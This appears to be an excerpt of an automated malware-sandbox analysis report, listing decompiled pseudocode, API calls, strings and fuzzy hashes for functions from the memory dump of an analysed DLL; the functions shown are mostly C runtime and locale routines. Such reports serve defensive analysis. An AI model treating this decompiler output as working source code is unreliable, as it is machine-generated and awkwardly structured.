Instruction Fuzzy Hash: 35C17F78D0838A9BDF01DFA9C844FBD7BB4AF1A314F254149E914A7381C7349D41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D494EA0, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6D494EA0(void* __ebx, void* __edi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				long _v40;
				void* __esi;
				char _t51;
				signed int _t58;
				intOrPtr _t59;
				void* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				void* _t66;
				long _t68;
				long _t70;
				intOrPtr _t74;
				intOrPtr _t76;
				signed int _t78;
				char _t80;
				intOrPtr _t83;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t97;
				long _t99;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t106;
				void* _t107;
				void* _t113;

				_t74 = _a8;
				_push(__edi);
				_v5 = 0;
				_t95 = _t74 + 0x10;
				_push(_t95);
				_v16 = 1;
				_v20 = _t95;
				_v12 =  *(_t74 + 8) ^  *0x6d534074;
				E6D494E60(__edi,  *(_t74 + 8) ^  *0x6d534074);
				E6D496197(_a12);
				_t51 = _a4;
				_t107 = _t106 + 0xc;
				_t92 =  *((intOrPtr*)(_t74 + 0xc));
				if(( *(_t51 + 4) & 0x00000066) != 0) {
					__eflags = _t92 - 0xfffffffe;
					if(_t92 != 0xfffffffe) {
						E6D496850(_t74, 0xfffffffe, _t95, 0x6d534074);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t51;
					_v28 = _a12;
					 *((intOrPtr*)(_t74 - 4)) =  &_v32;
					if(_t92 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t78 = _v12;
							_t20 = _t92 + 2; // 0x3
							_t58 = _t92 + _t20 * 2;
							_t76 =  *((intOrPtr*)(_t78 + _t58 * 4));
							_t59 = _t78 + _t58 * 4;
							_t79 =  *((intOrPtr*)(_t59 + 4));
							_v24 = _t59;
							if( *((intOrPtr*)(_t59 + 4)) == 0) {
								_t80 = _v5;
								goto L8;
							} else {
								_t60 = E6D496800(_t79, _t95);
								_t80 = 1;
								_v5 = 1;
								_t113 = _t60;
								if(_t113 < 0) {
									_v16 = 0;
									L14:
									_push(_t95);
									E6D494E60(_t92, _v12);
									goto L15;
								} else {
									if(_t113 > 0) {
										_t61 = _a4;
										__eflags =  *_t61 - 0xe06d7363;
										if( *_t61 == 0xe06d7363) {
											__eflags =  *0x6d50472c;
											if(__eflags != 0) {
												_t70 = E6D4D5F00(__eflags, "J,Im");
												_t107 = _t107 + 4;
												__eflags = _t70;
												if(_t70 != 0) {
													_t99 =  *0x6d50472c; // 0x6d492c4a
													 *0x6d5001e8(_a4, 1);
													 *_t99();
													_t95 = _v20;
													_t107 = _t107 + 8;
												}
												_t61 = _a4;
											}
										}
										E6D496834(_t61, _a8, _t61);
										_t63 = _a8;
										__eflags =  *((intOrPtr*)(_t63 + 0xc)) - _t92;
										if( *((intOrPtr*)(_t63 + 0xc)) != _t92) {
											E6D496850(_t63, _t92, _t95, 0x6d534074);
											_t63 = _a8;
										}
										_push(_t95);
										 *((intOrPtr*)(_t63 + 0xc)) = _t76;
										E6D494E60(_t92, _v16);
										_t83 =  *((intOrPtr*)(_v28 + 8));
										E6D496818();
										asm("int3");
										_t102 = _t100;
										_t104 = _t102;
										_push(_t104);
										_push(_t95);
										_t97 = _v40;
										__eflags = _t97 - 0xffffffe0;
										if(_t97 > 0xffffffe0) {
											L32:
											 *((intOrPtr*)(E6D4B41F9())) = 0xc;
											_t66 = 0;
											__eflags = 0;
										} else {
											__eflags = _t97;
											if(_t97 == 0) {
												_t97 = _t97 + 1;
											}
											while(1) {
												_t66 = RtlAllocateHeap( *0x6d540b4c, 0, _t97); // executed
												__eflags = _t66;
												if(_t66 != 0) {
													break;
												}
												__eflags = E6D4CE068();
												if(__eflags == 0) {
													goto L32;
												} else {
													_t68 = E6D4BA958(_t83, _t97, __eflags, _t97);
													_pop(_t83);
													__eflags = _t68;
													if(_t68 == 0) {
														goto L32;
													} else {
														continue;
													}
												}
												goto L33;
											}
										}
										L33:
										return _t66;
									} else {
										goto L8;
									}
								}
							}
							goto L34;
							L8:
							_t92 = _t76;
						} while (_t76 != 0xfffffffe);
						if(_t80 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L34:
			}

0x6d494ea7
0x6d494eab
0x6d494eac
0x6d494eb3
0x6d494ebc
0x6d494ebe
0x6d494ec5
0x6d494ec8
0x6d494ecb
0x6d494ed3
0x6d494ed8
0x6d494edb
0x6d494ede
0x6d494ee5
0x6d494f46
0x6d494f49
0x6d494f58
0x00000000
0x6d494f58
0x00000000
0x6d494ee7
0x6d494ee7
0x6d494eed
0x6d494ef3
0x6d494ef9
0x6d494f69
0x6d494f72
0x6d494efb
0x6d494f00
0x6d494f00
0x6d494f03
0x6d494f06
0x6d494f09
0x6d494f0c
0x6d494f0f
0x6d494f12
0x6d494f17
0x6d494f2d
0x00000000
0x6d494f19
0x6d494f1b
0x6d494f20
0x6d494f22
0x6d494f25
0x6d494f27
0x6d494f3d
0x6d494f5d
0x6d494f5d
0x6d494f61
0x00000000
0x6d494f29
0x6d494f29
0x6d494f73
0x6d494f76
0x6d494f7c
0x6d494f7e
0x6d494f85
0x6d494f8c
0x6d494f91
0x6d494f94
0x6d494f96
0x6d494f98
0x6d494fa5
0x6d494fab
0x6d494fad
0x6d494fb0
0x6d494fb0
0x6d494fb3
0x6d494fb3
0x6d494f85
0x6d494fbb
0x6d494fc0
0x6d494fc3
0x6d494fc6
0x6d494fd2
0x6d494fd7
0x6d494fd7
0x6d494fda
0x6d494fde
0x6d494fe1
0x6d494fee
0x6d494ff1
0x6d494ff6
0x6d494ffa
0x6d4b417a
0x6d4c1819
0x6d4c181c
0x6d4c181d
0x6d4c1820
0x6d4c1823
0x6d4c1855
0x6d4c185a
0x6d4c1860
0x6d4c1860
0x6d4c1825
0x6d4c1825
0x6d4c1827
0x6d4c1829
0x6d4c1829
0x6d4c1840
0x6d4c1849
0x6d4c184f
0x6d4c1851
0x00000000
0x00000000
0x6d4c1831
0x6d4c1833
0x00000000
0x6d4c1835
0x6d4c1836
0x6d4c183b
0x6d4c183c
0x6d4c183e
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4c183e
0x00000000
0x6d4c1833
0x6d4c1853
0x6d4c1862
0x6d4c1864
0x6d494f2b
0x00000000
0x6d494f2b
0x6d494f29
0x6d494f27
0x00000000
0x6d494f30
0x6d494f30
0x6d494f32
0x6d494f39
0x00000000
0x6d494f3b
0x00000000
0x6d494f39
0x6d494ef9
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 6D494ECB
___except_validate_context_record.LIBVCRUNTIME ref: 6D494ED3
_ValidateLocalCookies.LIBCMT ref: 6D494F61
__IsNonwritableInCurrentImage.LIBCMT ref: 6D494F8C
_ValidateLocalCookies.LIBCMT ref: 6D494FE1

Strings

csm, xrefs: 6D494F76
J,Im, xrefs: 6D494F7E, 6D494F87, 6D494F98

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: J,Im$csm
API String ID: 1170836740-2235640974
Opcode ID: 559814ae7577b14643d2c7aac726f99b01c80c73f3e99144b1ce7183a6a86c84
Instruction ID: 56d42ca07e9bd94896a8f8fd8a3f6961398c62a3a155eb5f8c1f496e43b8979a
Opcode Fuzzy Hash: 559814ae7577b14643d2c7aac726f99b01c80c73f3e99144b1ce7183a6a86c84
Instruction Fuzzy Hash: 2E41A234A1420A9BCF00CF6AC844EAEBFB5AF4A358F118159E9289F349D731DE05CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C240C, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E6D4C240C(void* __ebx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;
				void* _t150;

				_t150 = __fp0;
				_t78 =  *0x6d534074; // 0x97f0af70
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x6d540738 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x6d540738 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E6D4B5B30(_t116, _t129, _t150) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x6d540738 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x6d540738 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x6d540738 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E6D4C0616( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E6D4C0616();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E6D4903E3(_v8 ^ _t136);
			}

0x6d4c240c
0x6d4c2414
0x6d4c241b
0x6d4c241e
0x6d4c2426
0x6d4c242a
0x6d4c2436
0x6d4c2439
0x6d4c243c
0x6d4c2443
0x6d4c244b
0x6d4c244e
0x6d4c2454
0x6d4c245a
0x6d4c245f
0x6d4c2461
0x6d4c2464
0x6d4c2469
0x6d4c2473
0x6d4c247a
0x6d4c247d
0x6d4c2484
0x6d4c248b
0x6d4c24b7
0x6d4c24dd
0x6d4c24df
0x00000000
0x6d4c24b9
0x6d4c24bc
0x6d4c2583
0x6d4c258f
0x6d4c259a
0x6d4c259f
0x6d4c24c2
0x6d4c24c9
0x6d4c24ce
0x6d4c24d4
0x6d4c24da
0x00000000
0x6d4c24da
0x6d4c24d4
0x6d4c24bc
0x6d4c248d
0x6d4c2491
0x6d4c2494
0x6d4c249a
0x6d4c249c
0x6d4c249f
0x6d4c24a3
0x6d4c24e0
0x6d4c24e3
0x6d4c24e4
0x6d4c24e9
0x6d4c24ef
0x6d4c24f5
0x6d4c2504
0x6d4c250a
0x6d4c2510
0x6d4c2515
0x6d4c2531
0x6d4c25a4
0x6d4c25aa
0x6d4c2533
0x6d4c253b
0x6d4c2544
0x6d4c254a
0x00000000
0x6d4c254c
0x6d4c254e
0x6d4c2551
0x6d4c256a
0x00000000
0x6d4c256c
0x6d4c2570
0x6d4c2572
0x6d4c2575
0x00000000
0x6d4c2575
0x6d4c2570
0x6d4c256a
0x6d4c254a
0x6d4c2544
0x6d4c2531
0x6d4c2515
0x6d4c24ef
0x00000000
0x6d4c2578
0x6d4c2578
0x6d4c25ac
0x6d4c25be

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,6D4C2B81,?,?,?,?,?,?), ref: 6D4C244E
__fassign.LIBCMT ref: 6D4C24C9
__fassign.LIBCMT ref: 6D4C24E4
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6D4C250A
WriteFile.KERNEL32(?,?,00000000,6D4C2B81,00000000,?,?,?,?,?,?,?,?,?,6D4C2B81,?), ref: 6D4C2529
WriteFile.KERNEL32(?,?,00000001,6D4C2B81,00000000,?,?,?,?,?,?,?,?,?,6D4C2B81,?), ref: 6D4C2562

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 66215c870bcf2f18527e55402654be8f459f9590dd844a8301e5da7285109cb9
Instruction ID: 97f2cdaded1060c31db009cf59c5982260663a49d18d2682c6d76897284216c5
Opcode Fuzzy Hash: 66215c870bcf2f18527e55402654be8f459f9590dd844a8301e5da7285109cb9
Instruction Fuzzy Hash: EF519075A00249AFDF10CFA8C895FEEBBF8EF49300F15412AE955E7241DB709941CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CF76, Relevance: 10.6, APIs: 7, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E6D48CF76(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;
				void* _t70;

				_t48 = __ebx;
				_push(0x14);
				E6D490E9E(0x6d4fe9a2, __ebx, __edi, __esi);
				E6D476A10(_t66 - 0x14, 0);
				_t63 =  *0x6d53fe50; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6D451D10();
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6D452140( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6D476A77(_t66 - 0x14);
					return E6D490E67(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6D48D52A(__ebx, _t51, __edx, _t61, _t63, __eflags, _t70) - 0xffffffff;
						if(__eflags == 0) {
							E6D451940();
							E6D4924F4(_t66 - 0x20, 0x6d5329cc);
							asm("int3");
							_push(4);
							E6D490E9E(0x6d4fefbc, __ebx, _t61, _t63);
							_t64 = _t66 - 0x20;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_push( *((intOrPtr*)(_t66 + 8)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6d5044f4;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6D48E2BD(_t48, _t66 - 0x20, __edx, _t61, _t64,  *_t21, _t70);
							return E6D490E67(_t64);
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6D478A0B(__eflags, _t61);
							 *0x6d5001e8();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6d53fe50 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}

0x6d48cf76
0x6d48cf76
0x6d48cf7d
0x6d48cf87
0x6d48cf8c
0x6d48cf97
0x6d48cf9b
0x6d48cf9e
0x6d48cfa3
0x6d48cfa7
0x6d48cfac
0x6d48cfb0
0x6d48cff5
0x6d48cff8
0x6d48d004
0x6d48cfb2
0x6d48cfb4
0x6d48cfba
0x6d48cfc0
0x6d48cfc8
0x6d48cfcb
0x6d48d008
0x6d48d016
0x6d48d01b
0x6d48d01c
0x6d48d023
0x6d48d028
0x6d48d02a
0x6d48d030
0x6d48d033
0x6d48d039
0x6d48d03c
0x6d48d03c
0x6d48d03c
0x6d48d040
0x6d48d046
0x6d48d049
0x6d48d055
0x6d48cfcd
0x6d48cfcd
0x6d48cfd0
0x6d48cfd4
0x6d48cfd8
0x6d48cfe5
0x6d48cfed
0x6d48cfef
0x00000000
0x6d48cfef
0x6d48cfb6
0x6d48cfb6
0x00000000
0x6d48cfb6
0x6d48cfb4

APIs

__EH_prolog3.LIBCMT ref: 6D48CF7D
std::_Lockit::_Lockit.LIBCPMT ref: 6D48CF87

Part of subcall function 6D451D10: std::_Lockit::_Lockit.LIBCPMT ref: 6D451D40
Part of subcall function 6D451D10: std::_Lockit::~_Lockit.LIBCPMT ref: 6D451D68

std::_Facet_Register.LIBCPMT ref: 6D48CFD8
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CFF8
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48D016
__EH_prolog3.LIBCMT ref: 6D48D023
_Mpunct.LIBCPMT ref: 6D48D049

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Exception@8Facet_MpunctRegisterThrow
String ID:
API String ID: 2905739349-0
Opcode ID: 636d3e7e04e287bd44c7fdb6ad514ff7c9c926d60db453f3206e46ac650a599d
Instruction ID: 3cda77f413a03b387522f7995ad9991772a050b0cafb8a2872b8494a2c626318
Opcode Fuzzy Hash: 636d3e7e04e287bd44c7fdb6ad514ff7c9c926d60db453f3206e46ac650a599d
Instruction Fuzzy Hash: 6121A93180425A9BCF05CFA5C840EEEBBB1AF84354F22440EEA14AB391DF70DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BDEDB, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6D4BDEDB(void* __ecx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0x6d5341e0; // 0x8
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t15 = E6D4BF58C(_t11, 1, 0x364);
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = E6D4C48FD(_t13, _t16, __eflags,  *0x6d5341e0, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E6D4BDB97(_t13, _t15, "hyc");
							E6D4C02CE(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E6D4C02CE();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = E6D4C48A7(_t11, _t16, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x6d4bdedb
0x6d4bdee6
0x6d4bdee8
0x6d4bdeea
0x6d4bdeef
0x6d4bdef2
0x6d4bdf00
0x6d4bdf0c
0x6d4bdf0f
0x6d4bdf12
0x6d4bdf24
0x6d4bdf29
0x6d4bdf2b
0x6d4bdf36
0x6d4bdf3c
0x6d4bdf44
0x6d4bdf46
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4bdf2d
0x6d4bdf2d
0x00000000
0x6d4bdf2d
0x6d4bdf14
0x6d4bdf14
0x6d4bdf15
0x6d4bdf15
0x6d4bdf48
0x6d4bdf49
0x6d4bdf49
0x6d4bdef4
0x6d4bdefa
0x6d4bdefe
0x6d4bdf51
0x6d4bdf52
0x6d4bdf58
0x00000000
0x00000000
0x00000000
0x6d4bdefe
0x6d4bdf5f

APIs

GetLastError.KERNEL32(00000001,00000001,6D4D78BD,6D4B41FE,6D4C185A,6D4D78BB,?,6D491D91,6D4D78BD,6D4D78BB,00000000,00000000,?,6D45140C,6D4D78BF,6D4D78BF), ref: 6D4BDEE0
_free.LIBCMT ref: 6D4BDF15
_free.LIBCMT ref: 6D4BDF3C
SetLastError.KERNEL32(00000000,6D4D78BF), ref: 6D4BDF49
SetLastError.KERNEL32(00000000,6D4D78BF), ref: 6D4BDF52

Strings

hyc, xrefs: 6D4BDF30

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free
String ID: hyc
API String ID: 3170660625-2479075799
Opcode ID: 67ff05166153823f39a0d1fc125da1968a836a2430a76a5cf5e8fe01dbe0c9a9
Instruction ID: c231fee8f303f25c348a00c1e1bc0176ea73fec657a03491ce655016503f57b7
Opcode Fuzzy Hash: 67ff05166153823f39a0d1fc125da1968a836a2430a76a5cf5e8fe01dbe0c9a9
Instruction Fuzzy Hash: 6001493E10C60126DE0286394C84F1A2E79ABE63BAB33416DF60E93381FF31CC0181B5

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BFDE2, Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,00000000,00000000,6D47312A,?,?,?,6D4C0033,00000001,00000001,9F418D08), ref: 6D4BFE3C
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6D4C0033,00000001,00000001,9F418D08,00000000,?,?), ref: 6D4BFEC2
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,00000000,9F418D08,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6D4BFFBC
__freea.LIBCMT ref: 6D4BFFC9

Part of subcall function 6D4C1817: RtlAllocateHeap.NTDLL(00000000,00000001,6D4D78BB,?,6D491D91,6D4D78BD,6D4D78BB,00000000,00000000,?,6D45140C,6D4D78BF,6D4D78BF), ref: 6D4C1849

__freea.LIBCMT ref: 6D4BFFD2
__freea.LIBCMT ref: 6D4BFFF7

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: d64aae9329c9ae8725ff02fc828fe5395b48f28d3901d728b23a26c0257c136a
Instruction ID: 75019a6c6965533f8467b34cda28c3bd6eeacaef6440296edf7e4a85fdb1b704
Opcode Fuzzy Hash: d64aae9329c9ae8725ff02fc828fe5395b48f28d3901d728b23a26c0257c136a
Instruction Fuzzy Hash: C9510336A11217ABEB158E64CC40EBB7BA9EB56754F21462EFD0CD7280EB35DC40C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 6D45DB80, Relevance: 9.2, APIs: 6, Instructions: 157COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D45DBBD
std::_Lockit::_Lockit.LIBCPMT ref: 6D45DBDD
std::_Lockit::~_Lockit.LIBCPMT ref: 6D45DC05
__Getcoll.LIBCPMT ref: 6D45DCC5
std::_Facet_Register.LIBCPMT ref: 6D45DD44
std::_Lockit::~_Lockit.LIBCPMT ref: 6D45DD76

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
String ID:
API String ID: 1184649410-0
Opcode ID: e60c5b7b63a176c6bf965c008f8c3e1ca15a2f1e13090e738f0836c8505ea60e
Instruction ID: 0d12c34ef1351b0ca40a7f36d7b2a6d4fa9612865544c6a986b801ba202770c0
Opcode Fuzzy Hash: e60c5b7b63a176c6bf965c008f8c3e1ca15a2f1e13090e738f0836c8505ea60e
Instruction Fuzzy Hash: FB61A6B1904248DFDB12CF98C984FAEBBB4EF86314F228159D415AB280C775AE14CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D45A9E0, Relevance: 9.1, APIs: 6, Instructions: 133COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D45AA13
std::_Lockit::_Lockit.LIBCPMT ref: 6D45AA35
std::_Lockit::~_Lockit.LIBCPMT ref: 6D45AA5D
__Getctype.LIBCPMT ref: 6D45AB2D
std::_Facet_Register.LIBCPMT ref: 6D45AB61
std::_Lockit::~_Lockit.LIBCPMT ref: 6D45AB93

Memory Dump Source

Source File: 00000000.00000002.900815106.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000000.00000002.900803720.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901043048.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.901120525.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901129458.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.901146257.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.901164862.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

